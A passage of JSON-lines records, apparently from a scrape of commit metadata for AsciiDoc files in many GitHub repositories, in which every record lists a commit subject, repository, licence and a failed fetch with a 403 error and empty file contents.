releases\n","repos":"asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-pdf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41dd906f05ff91f2a6eaa63ab1bf950d8ec71063","subject":"Update 2015-11-03-rickshaw.adoc","message":"Update 2015-11-03-rickshaw.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-11-03-rickshaw.adoc","new_file":"_posts\/2015-11-03-rickshaw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc9db3655cd1e5f1479e7afcbb25dd8e0175b631","subject":"Add documentation for `will_return_by_value`","message":"Add documentation for `will_return_by_value`\n\nAdded documentation with example\n","repos":"cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cgreen-devs\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"efac122338e0f216923d0272d92a6ce7507109e8","subject":"Sect curl","message":"Sect curl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"29db2c1c129c07094dbddc24aad130d245bd71bb","subject":"adding MYSQL_ROOT_PASSWORD explanation","message":"adding MYSQL_ROOT_PASSWORD explanation\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d966abc3c077f2b91763d647478c966e19ea29e8","subject":"Apply the reviews.","message":"Apply the reviews.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/Getting Started.asciidoc","new_file":"docs\/src\/main\/asciidoc\/Getting Started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52fb3c1b9cd35a285929ae51694753db2f3f9951","subject":"docs: devel: fix link","message":"docs: devel: fix link\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/devel\/design.adoc","new_file":"docs\/devel\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"685304a8250fea226fa100d70e432e50badc48b4","subject":"Update 2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","message":"Update 2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","new_file":"_posts\/2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58876d25409a19ec553992b45a80f9bb02239b15","subject":"docs updated","message":"docs updated\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59b1d91848b1904a857cf58be357b1e89f195a52","subject":"y2b create post New 13\\","message":"y2b create post New 13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-26-New-13.adoc","new_file":"_posts\/2012-10-26-New-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"99df5d44ce39c321d9637566a424d4c8e233d27a","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b47977b9c66c4a0cbcc0aee8426981626c4bb5d7","subject":"Add CHANGELOG enttr for 2.1.1","message":"Add CHANGELOG enttr for 2.1.1\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464d328f104714c4277eed16c3c35dec7d913922","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d22acdf0fc3cd61022919c3f5a6fad37599eddf","subject":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","message":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5157eae0a40dad08bab21abf5130d6a60dbca8c","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87b88a91d230c79da35c99fd855e63e8d21d897f","subject":"Update 2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","message":"Update 
2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","new_file":"_posts\/2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74b42e784e790b97d2351b5df6a00f8013865ca4","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85754bee673e751f3dc59ca97ee9d01e8c8ddd7a","subject":"y2b create post 5 Reasons Headphones Are Better Than Earphones","message":"y2b create post 5 Reasons Headphones Are Better Than Earphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-28-5-Reasons-Headphones-Are-Better-Than-Earphones.adoc","new_file":"_posts\/2016-04-28-5-Reasons-Headphones-Are-Better-Than-Earphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da6f8c1b339621b581c650f4f6938f099f6b9977","subject":"y2b create post This New Speaker Will Blow Your Mind (Seriously)","message":"y2b create post This New Speaker Will Blow Your Mind (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-17-This-New-Speaker-Will-Blow-Your-Mind-Seriously.adoc","new_file":"_posts\/2017-08-17-This-New-Speaker-Will-Blow-Your-Mind-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb13511216d0a9cc06be68f15510ce62b0b354bf","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f228d5c579a765ba0915a7c83529a779086fc35f","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 
2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e46542c8cfda0e27e2231f9b8e566ba0ed1d496","subject":"Update 2015-09-17-Entrada-de-prueba-1.adoc","message":"Update 2015-09-17-Entrada-de-prueba-1.adoc","repos":"jpcanovas\/myBlog,jpcanovas\/myBlog,jpcanovas\/myBlog","old_file":"_posts\/2015-09-17-Entrada-de-prueba-1.adoc","new_file":"_posts\/2015-09-17-Entrada-de-prueba-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpcanovas\/myBlog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61b20db67b99faefc815d1eeed95eda8f8073530","subject":"Update 2016-02-10-Aaaaas.adoc","message":"Update 2016-02-10-Aaaaas.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-10-Aaaaas.adoc","new_file":"_posts\/2016-02-10-Aaaaas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b85028af073a38508b9c1bdf618aedb99e4cc2d8","subject":"Update 2016-02-10-testje.adoc","message":"Update 2016-02-10-testje.adoc","repos":"roelvs\/roelvs.github.io,roelvs\/roelvs.github.io,roelvs\/roelvs.github.io,roelvs\/roelvs.github.io","old_file":"_posts\/2016-02-10-testje.adoc","new_file":"_posts\/2016-02-10-testje.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roelvs\/roelvs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4468cfbba834259df2fbc0ba9674ffde044af3b8","subject":"Update 2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","message":"Update 2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","new_file":"_posts\/2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e57784d2cd3c124166a70cd222e9dabcd08623","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"fce1e0514dd40d92262aa916ec1f92f2d523b10b","subject":"Polish","message":"Polish\n","repos":"spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25e30e5ef4eab1e1ebc2011bba03a9e6e00f197b","subject":"doc to test API","message":"doc to test API\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54fddba080466d146fe88ea69965e3ec98d12bbb","subject":"Added state and license badges","message":"Added state and license badges","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1279b9b0e707d6cfedf7a054adcfcf35e46b60a5","subject":"Create README.adoc","message":"Create README.adoc","repos":"skazi-pivotal\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,skazi-pivotal\/StockInference-Spark,mattcaldwell\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,mattcaldwell\/StockInference-Spark,skazi-pivotal\/StockInference-Spark,mattcaldwell\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Pivotal-Open-Source-Hub\/StockInference-Spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee8ef50a4c700316b53f3a31f1dbd38c35cb66d2","subject":"Added first draft of a README.adoc","message":"Added first draft of a README.adoc\n\nChange-Id: I869c6d9608eea7339ecf127fb9637821938f2386\nSigned-off-by: Simon Scholz <86b72c53dacfdb9bb67c3d9e46af6b59fbfd212f@vogella.com>\n","repos":"vogellacompany\/swt-custom-widgets","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vogellacompany\/swt-custom-widgets.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6234f87ac4f493c8e2a60f06de075435677dedb0","subject":"Remove coverityCheck","message":"Remove 
coverityCheck\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1549c0018cd7f53cd5ce27b61267ea0defdf258","subject":"Add link to Python notes in README","message":"Add link to Python notes in README\n","repos":"cmpitg\/programming-language-notes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"529b79540df2800339dd7c7cebc3541aaeca436f","subject":"y2b create post New iPad 5 Parts Leaked? (First Look + Comparison)","message":"y2b create post New iPad 5 Parts Leaked? (First Look + Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-03-New-iPad-5-Parts-Leaked-First-Look--Comparison.adoc","new_file":"_posts\/2013-09-03-New-iPad-5-Parts-Leaked-First-Look--Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acac6f44d5c2616faef14a0a3d9b3b6ddfd5f620","subject":"Update 2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","message":"Update 2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","new_file":"_posts\/2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d74f61df1a5ff0e74139f7ae7e9a8fb2416a0f6","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c93513f18f00081eac5c05475f4f5ef727e577aa","subject":"Fix typo in reference docs","message":"Fix typo in reference docs\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"spring-session-docs\/src\/docs\/asciidoc\/index.adoc","new_file":"spring-session-docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c967017b0b2f528c595f89b5a07bf204a60b3b0","subject":"Update 2015-08-05-Recomendaciones-de-frameworks-python.adoc","message":"Update 2015-08-05-Recomendaciones-de-frameworks-python.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-08-05-Recomendaciones-de-frameworks-python.adoc","new_file":"_posts\/2015-08-05-Recomendaciones-de-frameworks-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75378cf761aca3054032a630d64057288092d8d3","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6436fea8e24cead1d0b921739da5f60651a3939","subject":"y2b create post Giant iPhone Zoom Lens - Does It Suck?","message":"y2b create post Giant iPhone Zoom Lens - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-16-Giant-iPhone-Zoom-Lens--Does-It-Suck.adoc","new_file":"_posts\/2016-05-16-Giant-iPhone-Zoom-Lens--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff39d04096921241f25cd374668dd3d96490995","subject":"y2b create post Apple Watch Unboxing \\u0026 Setup","message":"y2b create post Apple Watch Unboxing \\u0026 Setup","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-25-Apple-Watch-Unboxing-u0026-Setup.adoc","new_file":"_posts\/2015-04-25-Apple-Watch-Unboxing-u0026-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdbfefff311d4f9bd9cf6fbffc74beb00c2dab3f","subject":"Update 2015-06-19-Event-driven-processing-pipeline.adoc","message":"Update 2015-06-19-Event-driven-processing-pipeline.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-06-19-Event-driven-processing-pipeline.adoc","new_file":"_posts\/2015-06-19-Event-driven-processing-pipeline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35c17ce4117c24d10a107429adf5a054fc9a2a18","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 
2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729472a2aa37ed737d0fa0cf442ec6416c7b824a","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2d61fd4d892ef896de19c38f53a47eb6b42437d","subject":"Added initial translation of \"pakkeforl\u00f8p\" documentation","message":"Added initial translation of \"pakkeforl\u00f8p\" documentation\n","repos":"bjornna\/dips-ckm,DIPSASA\/dips-ckm","old_file":"doc\/kreftpakkeforl\u00f8p\/kreftforlop_dokumentasjon_en.adoc","new_file":"doc\/kreftpakkeforl\u00f8p\/kreftforlop_dokumentasjon_en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b93a8006f9fe8ea8aba83ad9c97e49c39dd7e65","subject":"Added TODO","message":"Added TODO","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"TODO.asciidoc","new_file":"TODO.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97636f44fd9e1e3614bec5d94157a2b81eb8c23b","subject":"Added readme to app controller","message":"Added readme to app controller\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"application_controller\/serial_interface\/README.adoc","new_file":"application_controller\/serial_interface\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c61bd3d2bd15e70ecb23593d2ce362f147b7df7f","subject":"add processserver secret doc","message":"add processserver secret 